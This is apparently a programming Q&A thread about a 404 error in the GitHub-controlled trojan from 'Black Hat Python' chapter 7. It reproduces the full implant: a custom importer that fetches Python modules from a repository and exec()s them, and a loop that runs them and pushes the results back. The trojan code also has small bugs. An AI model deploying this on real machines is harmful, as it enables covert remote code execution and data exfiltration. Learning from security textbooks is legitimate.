# black hat python chapter 7, I'm getting the error "github3.exceptions.NotFoundError:404"; can anyone see the problem here?

Tags: python, github

I've been following a book called Black Hat Python 2nd edition and, when it comes to the task in chapter 7, I'm getting errors like the titular "github3.exceptions.NotFoundError:404" i have no idea on how to fix it and looking at other questions has, unfortunately, not helped me. I'm going to put here the program in its entirety and all of the errors that i get when i run it. I hope that some of you can help me.

full program:

```
import base64
import github3
import importlib
import json
import sys
import random
import threading
import time
from datetime import datetime

def connect_to_github():
    with open("mytoken.txt") as f:
        token = f.read()
    user = 'Anderaxarex'
    sess = github3.login(token=token)
    return sess.repository(user, 'bhptrojan')

def get_content(dirname, module_name, repo):
    return repo.file_contents(f'{dirname}/{module_name}').content

class Trojan:
    def __init__(self, id):
        self.id = id
        self.config_file = f'{id}.json'
        self.repo = connect_to_github()
        self.data_path = f'data/{id}'

    def get_config(self):
        config_file = get_content('config', self.config_file, self.repo)
        config = json.loads(base64.b64decode(config_file))

        for task in config:
            if task['module'] not in sys.modules:
                exec("import %s" % task['module'])
        return config

    def store_result(self, data):
        message = datetime.now().isoformat()
        remotepath = f'data/{self.id}/{message}.data'
        bindata = bytes('%r' % data, 'utf-8')
        self.repo.create_file(remotepath, message, base64.b64decode(bindata))

    def module_runner(self, module):
        result = sys.modules[module].run()
        self.store_result(result)

    def run(self):
        while True:
            config = self.get_config()
            for task in config:
                thread = threading.Thread(
                    target=self.module_runner, 
                    args=(task['module'],)
                )
                thread.start()
                time.sleep(random.randint(1, 10))

            time.sleep(random.randint(3*60, 3*60*60))

class GitImporter:
    def __init__(self):
        self.current_module_code=""
        self.repo = connect_to_github()
    
    def find_module(self, name, path=None):
        print("[||] Retrieving %s" % name)
        self.repo = connect_to_github()
        new_library = get_content('modules', f'{name}.py', self.repo)
        if new_library is not None:
            self.current_module_code = base64.b64decode(new_library)
            return self
    
    def load_modules(self, name):
        spec = importlib.util.spec_from_loader(name, loader=None, origin=self.repo.git_url)
        new_module = importlib.util.module_from_spec(spec)
        exec(self.current_module_code, new_module.__dict__)
        sys.modules[spec.name] = new_module
        return new_module

if __name__ == '__main__':
    sys.meta_path.append(GitImporter())
    trojan = Trojan(f'{random.randint(1000, 10000)}')
    trojan.run()
```

error messages:

```
Traceback (most recent call last):
  File "tro.py", line 83, in <module>
    trojan.run()
  File "tro.py", line 49, in run
    config = self.get_config()
  File "tro.py", line 29, in get_config
    config_file = get_content('config', self.config_file, self.repo)
  File "tro.py", line 19, in get_content
    return repo.file_contents(f'{dirname}/{module_name}').content
  File "C:\Users\ascar\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.8_qbz5n2kfra8p0\LocalCache\local-packages\Python38\site-packages\github3\repos\repo.py", line 1676, in file_contents
    json = self._json(self._get(url, params={"ref": ref}), 200)
  File "C:\Users\ascar\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.8_qbz5n2kfra8p0\LocalCache\local-packages\Python38\site-packages\github3\models.py", line 153, in _json
    raise exceptions.error_for(response)
github3.exceptions.NotFoundError: 404 Not Found
```

Comment: Have you done ```pip install github3.py```?

Comment: yes i have installed it

Answer (score 0):

You're getting this error because the repo you are trying to connect to, doesn't exist in GitHub.

You can verify this from your browser. Go to https://github.com/Anderaxarex/bhptrojan in your browser. It doesn't exist.

Comment: it exists, but it was private

Comment: Did you try making the repository public? Does it work in that case?

Comment: yes i did and it still doesn't work

Comment: @astronautlius The repository has been named `bhp_trojan` in your GitHub. You need to update your code accordingly.

Comment: yeah i changed the name and now this issue is fixed, Im getting a new error but I'll make a different question

Answer (score 0):

I don't know the book specifically, but have browsed through chapter 7 from the 1st edition. If I am correct then `Anderaxarex` is your username. In that case, you will need to create the repository `bhptrojan` on your github account.